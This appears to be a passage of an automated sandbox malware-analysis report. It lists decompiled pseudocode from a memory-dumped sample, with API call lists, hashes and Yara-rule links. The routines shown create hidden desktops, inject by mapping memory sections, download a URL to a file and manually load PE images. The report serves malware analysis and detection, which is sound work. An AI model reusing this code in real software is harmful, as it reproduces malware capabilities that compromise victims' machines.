                                                                                                        0x7098a057
                                                                                                        0x7098a05e
                                                                                                        0x7098a079
                                                                                                        0x7098a07d
                                                                                                        0x7098a082
                                                                                                        0x7098a089
                                                                                                        0x7098a094
                                                                                                        0x7098a094
                                                                                                        0x7098a09a
                                                                                                        0x00000000
                                                                                                        0x7098a0a7
                                                                                                        0x7098a05e
                                                                                                        0x7098a0a8

                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 7098A020
                                                                                                        • GetThreadDesktop.USER32(00000000), ref: 7098A027
                                                                                                        • StrChrW.SHLWAPI(7098CAD4,00000054,00000000,00000000,00000000,10000000,00000000), ref: 7098A04A
                                                                                                        • CreateDesktopW.USER32 ref: 7098A051
                                                                                                        • CreateThread.KERNEL32 ref: 7098A073
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 7098A082
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098A089
                                                                                                        • Sleep.KERNEL32(00000FA0), ref: 7098A094
                                                                                                        • CloseDesktop.USER32(00000000), ref: 7098A0A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: DesktopThread$CloseCreate$CurrentHandleObjectSingleSleepWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 4135746217-0
                                                                                                        • Opcode ID: 0b3a4d16cd3d774f42bc1005fa77568ecc4bb130b7cfea15eb456c5ec1540f4f
                                                                                                        • Instruction ID: 62f3462cec0b9ac1a05d5e17840ae4b1c52dd2c4019f16a062dee29cc7836fc3
                                                                                                        • Opcode Fuzzy Hash: 0b3a4d16cd3d774f42bc1005fa77568ecc4bb130b7cfea15eb456c5ec1540f4f
                                                                                                        • Instruction Fuzzy Hash: 740186B326D7027BF2205F76AC5DF593668AB06B06F304129FB02E53D0DB70E401AB15
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709826E0, Relevance: 12.1, APIs: 8, Instructions: 98nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E709826E0() {
				char _v8;
				void* _v16;
				long _v24;
				void* _v32;
				long _v44;
				void* _v48;
				void* _v56;
				void* _v64;
				long _v80;
				void* _v88;
				void* _v92;
				void* _v120;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _t45;
				void* _t58;
				intOrPtr _t59;

				_t58 =  *0x7098f53c; // 0x70980000
				_t1 = _t58 + 0x3c; // 0xf0
				_t59 =  *_t1;
				_t45 = 0;
				if( *((intOrPtr*)(_t59 + _t58)) == 0x4550) {
					_push(8);
					_push( &_v8);
					_v24 = 0;
					L7098BF02();
					_v16 =  *(_t59 + _t58 + 0x50);
					if(NtCreateSection( &_v32, 0xe, 0,  &_v16, 0x40, 0x8000000, 0) >= 0) {
						_v48 = 0;
						_v44 = 0;
						if(NtMapViewOfSection(_v56, 0xffffffff,  &_v48, 0, 0, 0,  &_v44, 2, 0, 0x40) >= 0) {
							_v88 = 0;
							if(NtMapViewOfSection(_v92, _v64,  &_v88, 0, 0, 0,  &_v80, 2, 0, 0x40) >= 0) {
								RtlMoveMemory(_v120, _t58,  *(_t59 + _t58 + 0x50));
								if(E70982650(_v132, _v136) == 0) {
									NtUnmapViewOfSection(_v140, _v136);
								} else {
									_t45 = _v136;
								}
							}
							NtUnmapViewOfSection(0xffffffff, _v120);
						}
						NtClose(_v92);
					}
				}
				return _t45;
			}





















                                                                                                        0x709826e6
                                                                                                        0x709826ec
                                                                                                        0x709826ec
                                                                                                        0x709826ef
                                                                                                        0x709826f8
                                                                                                        0x709826fe
                                                                                                        0x70982704
                                                                                                        0x70982705
                                                                                                        0x70982709
                                                                                                        0x70982727
                                                                                                        0x70982732
                                                                                                        0x70982751
                                                                                                        0x70982755
                                                                                                        0x70982760
                                                                                                        0x7098277e
                                                                                                        0x70982789
                                                                                                        0x70982796
                                                                                                        0x709827af
                                                                                                        0x709827c1
                                                                                                        0x709827b1
                                                                                                        0x709827b1
                                                                                                        0x709827b1
                                                                                                        0x709827af
                                                                                                        0x709827cd
                                                                                                        0x709827cd
                                                                                                        0x709827d7
                                                                                                        0x709827d7
                                                                                                        0x70982732
                                                                                                        0x709827e4

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000008), ref: 70982709
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 7098272B
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 70982759
                                                                                                        • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 70982782
                                                                                                        • RtlMoveMemory.NTDLL(?,70980000,?), ref: 70982796
                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 709827C1
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 709827CD
                                                                                                        • NtClose.NTDLL(?), ref: 709827D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$MemoryUnmap$CloseCreateMoveZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 1304417992-0
                                                                                                        • Opcode ID: d58b559f8bcbc656c55be40ea4cf9fef354c51de0d86a37e036cccd1b847c527
                                                                                                        • Instruction ID: a077e312b0257e061b64e6b28c980f1a733225f16710c960f13fe4a10d6f7621
                                                                                                        • Opcode Fuzzy Hash: d58b559f8bcbc656c55be40ea4cf9fef354c51de0d86a37e036cccd1b847c527
                                                                                                        • Instruction Fuzzy Hash: 603105B1208305BFE200DA65CD81E6BB3ECABC8658F444A1CB69596285D674FC058B72
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70987D00, Relevance: 12.1, APIs: 8, Instructions: 86threadwindownativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70987D00(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _t7;
				void* _t8;
				_Unknown_base(*)()* _t10;
				long _t14;
				void* _t17;
				int _t20;
				void* _t22;
				void* _t24;
				struct HWND__* _t25;
				int _t26;
				void* _t27;

				_t20 = _a12;
				_t26 = _a8;
				_t25 = _a4;
				_t27 = _t26 - 0x16;
				if(_t27 > 0) {
					if(_t26 == 0x18) {
						goto L15;
					} else {
						if(_t26 == 0x112) {
							_t7 = _t20 - 0xf020;
							if(_t7 == 0) {
								goto L15;
							} else {
								_t8 = _t7 - 0x10;
								if(_t8 == 0 || _t8 == 0xf0) {
									goto L15;
								} else {
									goto L19;
								}
							}
						} else {
							if(_t26 != 0x83fc) {
								goto L19;
							} else {
								 *0x7098f6c0 = _t20;
								 *0x7098f570 = CreateThread(0, 0, E70987240, 0, 0, 0x7098f574);
								goto L15;
							}
						}
					}
				} else {
					if(_t27 == 0) {
						PostMessageW(_t25, 0x10, 0, 0);
						goto L19;
					} else {
						if(_t26 == 3 || _t26 == 7) {
							L15:
							return 0;
						} else {
							if(_t26 == 0x10) {
								 *0x7098f560 = 1;
								if( *0x7098f570 != 0) {
									_t14 =  *0x7098f574; // 0x0
									PostThreadMessageW(_t14, _t26, 0, 0);
									_t22 =  *0x7098f570; // 0x0
									if(WaitForSingleObject(_t22, 0x1388) != 0) {
										_t24 =  *0x7098f570; // 0x0
										NtTerminateThread(_t24, 0);
									}
									_t17 =  *0x7098f570; // 0x0
									CloseHandle(_t17);
								}
								PostQuitMessage(0);
							}
							L19:
							_t10 =  *0x7098f6c0; // 0x0
							return CallWindowProcW(_t10, _t25, _t26, _t20, _a16);
						}
					}
				}
			}














                                                                                                        0x70987d01
                                                                                                        0x70987d06
                                                                                                        0x70987d0b
                                                                                                        0x70987d0f
                                                                                                        0x70987d12
                                                                                                        0x70987da5
                                                                                                        0x00000000
                                                                                                        0x70987da7
                                                                                                        0x70987dad
                                                                                                        0x70987de6
                                                                                                        0x70987deb
                                                                                                        0x00000000
                                                                                                        0x70987ded
                                                                                                        0x70987ded
                                                                                                        0x70987df0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987df0
                                                                                                        0x70987daf
                                                                                                        0x70987db5
                                                                                                        0x00000000
                                                                                                        0x70987db7
                                                                                                        0x70987dcb
                                                                                                        0x70987dd7
                                                                                                        0x00000000
                                                                                                        0x70987dd7
                                                                                                        0x70987db5
                                                                                                        0x70987dad
                                                                                                        0x70987d18
                                                                                                        0x70987d18
                                                                                                        0x70987d9a
                                                                                                        0x00000000
                                                                                                        0x70987d1a
                                                                                                        0x70987d1d
                                                                                                        0x70987dde
                                                                                                        0x70987de1
                                                                                                        0x70987d2c
                                                                                                        0x70987d2f
                                                                                                        0x70987d3c
                                                                                                        0x70987d46
                                                                                                        0x70987d48
                                                                                                        0x70987d53
                                                                                                        0x70987d59
                                                                                                        0x70987d6d
                                                                                                        0x70987d6f
                                                                                                        0x70987d78
                                                                                                        0x70987d78
                                                                                                        0x70987d7d
                                                                                                        0x70987d83
                                                                                                        0x70987d83
                                                                                                        0x70987d8b
                                                                                                        0x70987d8b
                                                                                                        0x70987df9
                                                                                                        0x70987dfd
                                                                                                        0x70987e10
                                                                                                        0x70987e10
                                                                                                        0x70987d1d
                                                                                                        0x70987d18

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32 ref: 70987D53
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 70987D65
                                                                                                        • NtTerminateThread.NTDLL(00000000,00000000), ref: 70987D78
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70987D83
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 70987D8B
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 70987D9A
                                                                                                        • CreateThread.KERNEL32 ref: 70987DD1
                                                                                                        • CallWindowProcW.USER32(00000000,?,?,?,?), ref: 70987E07
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread$CallCloseCreateHandleObjectProcQuitSingleTerminateWaitWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1229868629-0
                                                                                                        • Opcode ID: 076dc50a9b565d64050765b02615fb4d8dd6185cc2f2d246faca6432f50518a7
                                                                                                        • Instruction ID: 0be96f63e421f6cb2e9d8f23027daeb9d0ff0dba1f78011e73f0469f91967303
                                                                                                        • Opcode Fuzzy Hash: 076dc50a9b565d64050765b02615fb4d8dd6185cc2f2d246faca6432f50518a7
                                                                                                        • Instruction Fuzzy Hash: CA216F73A183016BE310DB668C58B7AB67CAB94740F20452AF643963E1D771D881A652
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985DF0, Relevance: 12.1, APIs: 8, Instructions: 81networkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70985DF0() {
				WCHAR* _v16;
				WCHAR* _v36;
				void* _v1048;
				void _v1068;
				long _v1076;
				long _v1080;
				void _v1084;
				void* _v1088;
				long _v1092;
				long _v1096;
				WCHAR* _t13;
				long _t23;
				void* _t27;
				long _t33;
				void* _t36;
				void* _t38;

				_t13 =  *0x7098f5c8; // 0xb64190
				_t33 = 0;
				_t38 = InternetOpenW(_t13, 0, 0, 0, 0);
				_v1048 = _t38;
				if(_t38 != 0) {
					_t27 = InternetOpenUrlW(_t38, _v16, 0, 0, 0x846a0000, 0);
					if(_t27 != 0) {
						_t36 = CreateFileW(_v36, 0x40000000, 0, 0, 2, 0x80, 0);
						if(_t36 != 0xffffffff) {
							_v1080 = 0;
							_v1076 = 0;
							do {
								if(InternetReadFile(_t27,  &_v1068, 0x400,  &_v1080) == 0) {
									goto L7;
								} else {
									_t23 = _v1096;
									if(_t23 != 0) {
										WriteFile(_t36,  &_v1084, _t23,  &_v1092, 0);
										goto L7;
									}
								}
								break;
								L7:
							} while (_v1096 > 0);
							_t33 = 1;
							CloseHandle(_t36);
							_t38 = _v1088;
						}
						InternetCloseHandle(_t27);
					}
					InternetCloseHandle(_t38);
				}
				return _t33;
			}



















                                                                                                        0x70985df6
                                                                                                        0x70985dfd
                                                                                                        0x70985e0a
                                                                                                        0x70985e0c
                                                                                                        0x70985e12
                                                                                                        0x70985e30
                                                                                                        0x70985e34
                                                                                                        0x70985e58
                                                                                                        0x70985e5d
                                                                                                        0x70985e65
                                                                                                        0x70985e69
                                                                                                        0x70985e73
                                                                                                        0x70985e87
                                                                                                        0x00000000
                                                                                                        0x70985e89
                                                                                                        0x70985e89
                                                                                                        0x70985e8f
                                                                                                        0x70985e9f
                                                                                                        0x00000000
                                                                                                        0x70985e9f
                                                                                                        0x70985e8f
                                                                                                        0x00000000
                                                                                                        0x70985ea1
                                                                                                        0x70985ea1
                                                                                                        0x70985ea9
                                                                                                        0x70985eae
                                                                                                        0x70985eb4
                                                                                                        0x70985eb4
                                                                                                        0x70985eb9
                                                                                                        0x70985ebf
                                                                                                        0x70985ec1
                                                                                                        0x70985ec7
                                                                                                        0x70985ed2

                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00B64190,00000000,00000000,00000000,00000000), ref: 70985E04
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,846A0000,00000000), ref: 70985E2A
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 70985E52
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 70985E83
                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 70985E9F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70985EAE
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985EB9
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985EC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseFileHandle$Open$CreateReadWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 2705228764-0
                                                                                                        • Opcode ID: 7ca887efced570d636381274316917638ddc7702dd1b0d56056dcb29fbf16b73
                                                                                                        • Instruction ID: 9d4d59fc755c0ee5f6936d72e6f075502eb1a80e688924fd82ad8e516146b1e8
                                                                                                        • Opcode Fuzzy Hash: 7ca887efced570d636381274316917638ddc7702dd1b0d56056dcb29fbf16b73
                                                                                                        • Instruction Fuzzy Hash: E621A4B2118341BFD3109F56CC48FAB7ABCEBC9B11F10092DB61292391D770D909C7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985180, Relevance: 12.1, APIs: 8, Instructions: 63memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70985180(struct HINSTANCE__* _a4, WCHAR* _a8) {
				signed int _t20;
				struct HINSTANCE__* _t22;
				int _t23;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				void* _t32;

				_t22 = _a4;
				_t30 = 0;
				_t28 = FindResourceW(_t22, _a8, 5);
				if(_t28 == 0) {
					return 0;
				} else {
					_t32 = LoadResource(_t22, _t28);
					if(_t32 != 0) {
						_t23 = SizeofResource(_t22, _t28);
						_t29 = LockResource(_t32);
						if(_t29 != 0) {
							_t30 = HeapAlloc(GetProcessHeap(), 8, _t23);
							RtlMoveMemory(_t30, _t29, _t23);
							_t20 =  *(_t30 + 0xc);
							if((_t20 & 0x40000000) == 0) {
								 *(_t30 + 8) =  *(_t30 + 8) & 0xfffbffff | 0x08000080;
							}
							 *(_t30 + 0xc) = _t20 & 0xefffffff;
							 *((intOrPtr*)(_t30 + 0x16)) = 0;
						}
						FreeResource(_t32);
					}
					return _t30;
				}
			}










                                                                                                        0x70985185
                                                                                                        0x7098518f
                                                                                                        0x70985197
                                                                                                        0x7098519b
                                                                                                        0x70985219
                                                                                                        0x7098519d
                                                                                                        0x709851a6
                                                                                                        0x709851aa
                                                                                                        0x709851b5
                                                                                                        0x709851bd
                                                                                                        0x709851c1
                                                                                                        0x709851d4
                                                                                                        0x709851d8
                                                                                                        0x709851dd
                                                                                                        0x709851e5
                                                                                                        0x709851f6
                                                                                                        0x709851f6
                                                                                                        0x70985200
                                                                                                        0x70985203
                                                                                                        0x70985203
                                                                                                        0x70985207
                                                                                                        0x70985207
                                                                                                        0x70985213
                                                                                                        0x70985213

                                                                                                        APIs
                                                                                                        • FindResourceW.KERNEL32(?,?,00000005), ref: 70985191
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 709851A0
                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 709851AE
                                                                                                        • LockResource.KERNEL32(00000000), ref: 709851B7
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 709851C6
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709851CD
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 709851D8
                                                                                                        • FreeResource.KERNEL32(00000000), ref: 70985207
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Heap$AllocFindFreeLoadLockMemoryMoveProcessSizeof
                                                                                                        • String ID:
                                                                                                        • API String ID: 1815471765-0
                                                                                                        • Opcode ID: 59389aa4ad180812beb69e08862541f717c9222e2f6741eb5186cb0f5518b736
                                                                                                        • Instruction ID: a935ecb3cac7ccc9a02ff2a805a1808a0a525c07c4d05176d0ca808941831964
                                                                                                        • Opcode Fuzzy Hash: 59389aa4ad180812beb69e08862541f717c9222e2f6741eb5186cb0f5518b736
                                                                                                        • Instruction Fuzzy Hash: 811173B32057016FD3105BAA9C8CF5BBBADEB85761B10452DF526C2391DA34D8008B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981A80, Relevance: 9.1, APIs: 6, Instructions: 143memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E70981A80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				void* _v44;
				intOrPtr _v172;
				char _v356;
				long _v360;
				void* __edi;
				void* __esi;
				void* _t52;
				void* _t69;
				intOrPtr _t70;
				intOrPtr* _t83;
				signed int _t85;
				intOrPtr _t88;

				_t82 = _a4;
				_t69 = 0;
				if(_a4 != 0) {
					_t91 = _a8;
					_v44 = 0;
					_v24 = 0;
					_v16 = 0;
					_v20 = 0;
					_v4 = 0;
					_t88 = E70981490( &_v356, _t82, _a8);
					if(_t88 != 0) {
						_t83 = _a16;
					} else {
						_t70 = _a12;
						_push( &_v356);
						_t88 = E70981570(_t70);
						if(_t88 != 0) {
							_t83 = _a16;
						} else {
							_t88 = E70981650( &_v356, _t82, _t91, _t70);
							if(_t88 != 0) {
								L18:
								_t83 = _a16;
								goto L19;
							} else {
								_t88 = E709816F0( &_v356);
								if(_t88 != 0) {
									goto L18;
								} else {
									_t88 = E709817B0( &_v356);
									if(_t88 != 0) {
										if(_v24 != 0) {
											_t85 = 0;
											if(_v20 > 0) {
												do {
													FreeLibrary( *(_v24 + _t85 * 4));
													_t85 = _t85 + 1;
												} while (_t85 < _v20);
											}
											HeapFree(GetProcessHeap(), 0, _v24);
										}
										goto L18;
									} else {
										_t88 = E70981960( &_v356);
										if(_t88 != 0) {
											goto L18;
										} else {
											_t83 = _a16;
											if(_t83 != 0) {
												_v12 =  *((intOrPtr*)(_t83 + 0x2c));
												_v8 =  *((intOrPtr*)(_t83 + 0x30));
											}
											_t88 = E70981A30( &_v356, _t70);
											if(_t88 != 0) {
												L19:
												_push(0x8000);
												_push( &_v360);
												_push( &_v28);
												_push(0xffffffff);
												_v360 = 0;
												L7098BEEA();
											} else {
												if(_t83 != 0) {
													 *((intOrPtr*)(_t83 + 0xc)) = _v32;
													 *((intOrPtr*)(_t83 + 0x10)) = _v28;
													 *((intOrPtr*)(_t83 + 0x14)) = _v4;
													 *((intOrPtr*)(_t83 + 4)) = 0x3c;
													 *((intOrPtr*)(_t83 + 8)) = _t70;
													 *((intOrPtr*)(_t83 + 0x18)) = _v172;
													 *(_t83 + 0x1c) = _v24;
													 *((intOrPtr*)(_t83 + 0x20)) = _v20;
												}
											}
										}
									}
								}
							}
						}
						_t52 = _v44;
						if(_t52 != 0) {
							HeapFree(GetProcessHeap(), 0, _t52);
						}
						_t69 = 0;
					}
					if(_t83 != _t69) {
						 *_t83 = _t88;
					}
					return _t88;
				} else {
					_t2 = _t69 - 2; // -2
					return _t2;
				}
			}























                                                                                                        0x70981a88
                                                                                                        0x70981a8f
                                                                                                        0x70981a93
                                                                                                        0x70981aa2
                                                                                                        0x70981ab0
                                                                                                        0x70981ab7
                                                                                                        0x70981abe
                                                                                                        0x70981ac5
                                                                                                        0x70981acc
                                                                                                        0x70981ad8
                                                                                                        0x70981adf
                                                                                                        0x70981c70
                                                                                                        0x70981ae5
                                                                                                        0x70981ae5
                                                                                                        0x70981af0
                                                                                                        0x70981af8
                                                                                                        0x70981aff
                                                                                                        0x70981c4a
                                                                                                        0x70981b05
                                                                                                        0x70981b11
                                                                                                        0x70981b18
                                                                                                        0x70981c20
                                                                                                        0x70981c20
                                                                                                        0x00000000
                                                                                                        0x70981b1e
                                                                                                        0x70981b26
                                                                                                        0x70981b2d
                                                                                                        0x00000000
                                                                                                        0x70981b33
                                                                                                        0x70981b38
                                                                                                        0x70981b3c
                                                                                                        0x70981bdf
                                                                                                        0x70981be1
                                                                                                        0x70981bea
                                                                                                        0x70981bf2
                                                                                                        0x70981bfd
                                                                                                        0x70981bff
                                                                                                        0x70981c00
                                                                                                        0x70981bf2
                                                                                                        0x70981c1a
                                                                                                        0x70981c1a
                                                                                                        0x00000000
                                                                                                        0x70981b42
                                                                                                        0x70981b47
                                                                                                        0x70981b4b
                                                                                                        0x00000000
                                                                                                        0x70981b51
                                                                                                        0x70981b51
                                                                                                        0x70981b5a
                                                                                                        0x70981b62
                                                                                                        0x70981b69
                                                                                                        0x70981b69
                                                                                                        0x70981b7a
                                                                                                        0x70981b81
                                                                                                        0x70981c27
                                                                                                        0x70981c27
                                                                                                        0x70981c30
                                                                                                        0x70981c38
                                                                                                        0x70981c39
                                                                                                        0x70981c3b
                                                                                                        0x70981c43
                                                                                                        0x70981b87
                                                                                                        0x70981b89
                                                                                                        0x70981ba4
                                                                                                        0x70981bae
                                                                                                        0x70981bb8
                                                                                                        0x70981bc2
                                                                                                        0x70981bc9
                                                                                                        0x70981bcc
                                                                                                        0x70981bcf
                                                                                                        0x70981bd2
                                                                                                        0x70981bd2
                                                                                                        0x70981b89
                                                                                                        0x70981b81
                                                                                                        0x70981b4b
                                                                                                        0x70981b3c
                                                                                                        0x70981b2d
                                                                                                        0x70981b18
                                                                                                        0x70981c51
                                                                                                        0x70981c5a
                                                                                                        0x70981c66
                                                                                                        0x70981c66
                                                                                                        0x70981c6c
                                                                                                        0x70981c6c
                                                                                                        0x70981c79
                                                                                                        0x70981c7b
                                                                                                        0x70981c7b
                                                                                                        0x70981c89
                                                                                                        0x70981a96
                                                                                                        0x70981a96
                                                                                                        0x70981aa0
                                                                                                        0x70981aa0

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 70981C5F
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70981C66
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 3859560861-0
                                                                                                        • Opcode ID: 23c5da97fae7e041a163c754a08676a8530cc422b19d05140e7b18f3a8e4d45a
                                                                                                        • Instruction ID: 165130ba94b4bed1e85e9904edcfae27d525800e4cf05e91030fedd47d0bb677
                                                                                                        • Opcode Fuzzy Hash: 23c5da97fae7e041a163c754a08676a8530cc422b19d05140e7b18f3a8e4d45a
                                                                                                        • Instruction Fuzzy Hash: 835139B2948341DBC3318F55C880BDFB3E9BB88350F114A2DE89A97380D735A8458B93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981C90, Relevance: 6.1, APIs: 4, Instructions: 69memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 57%
                                                                                                        			E70981C90(intOrPtr _a4) {
				long _v4;
				intOrPtr* _t24;
				intOrPtr _t30;
				signed int _t37;
				intOrPtr _t39;
				void* _t40;

				_t39 = _a4;
				_t40 = 1;
				if(_t39 == 0 ||  *((intOrPtr*)(_t39 + 4)) != 0x3c ||  *((intOrPtr*)(_t39 + 0xc)) == 0) {
					L14:
					return 0;
				} else {
					_t30 = _t39 + 0x10;
					_a4 = _t30;
					if( *((intOrPtr*)(_t39 + 0x10)) == 0) {
						goto L14;
					} else {
						if( *(_t39 + 0x1c) != 0) {
							_t37 = 0;
							if( *((intOrPtr*)(_t39 + 0x20)) > 0) {
								do {
									FreeLibrary( *( *(_t39 + 0x1c) + _t37 * 4));
									_t37 = _t37 + 1;
								} while (_t37 <  *((intOrPtr*)(_t39 + 0x20)));
								_t30 = _a4;
							}
							HeapFree(GetProcessHeap(), 0,  *(_t39 + 0x1c));
						}
						if(( *(_t39 + 8) & 0x00000001) == 0) {
							_t24 =  *((intOrPtr*)(_t39 + 0x14));
							if(_t24 != 0) {
								_t40 =  *_t24( *((intOrPtr*)(_t39 + 0xc)), 0, 0);
							}
						}
						_push(0x8000);
						_push( &_v4);
						_push(_t30);
						_push(0xffffffff);
						_v4 = 0;
						L7098BEEA();
						return _t40;
					}
				}
			}









                                                                                                        0x70981c94
                                                                                                        0x70981c98
                                                                                                        0x70981c9f
                                                                                                        0x70981d43
                                                                                                        0x70981d47
                                                                                                        0x70981cb9
                                                                                                        0x70981cbd
                                                                                                        0x70981cc0
                                                                                                        0x70981cc4
                                                                                                        0x00000000
                                                                                                        0x70981cc6
                                                                                                        0x70981cca
                                                                                                        0x70981ccd
                                                                                                        0x70981cd2
                                                                                                        0x70981ce0
                                                                                                        0x70981ce7
                                                                                                        0x70981ce9
                                                                                                        0x70981cea
                                                                                                        0x70981cef
                                                                                                        0x70981cef
                                                                                                        0x70981d00
                                                                                                        0x70981d06
                                                                                                        0x70981d0b
                                                                                                        0x70981d0d
                                                                                                        0x70981d12
                                                                                                        0x70981d1e
                                                                                                        0x70981d1e
                                                                                                        0x70981d12
                                                                                                        0x70981d20
                                                                                                        0x70981d29
                                                                                                        0x70981d2a
                                                                                                        0x70981d2b
                                                                                                        0x70981d2d
                                                                                                        0x70981d35
                                                                                                        0x70981d40
                                                                                                        0x70981d40
                                                                                                        0x70981cc4

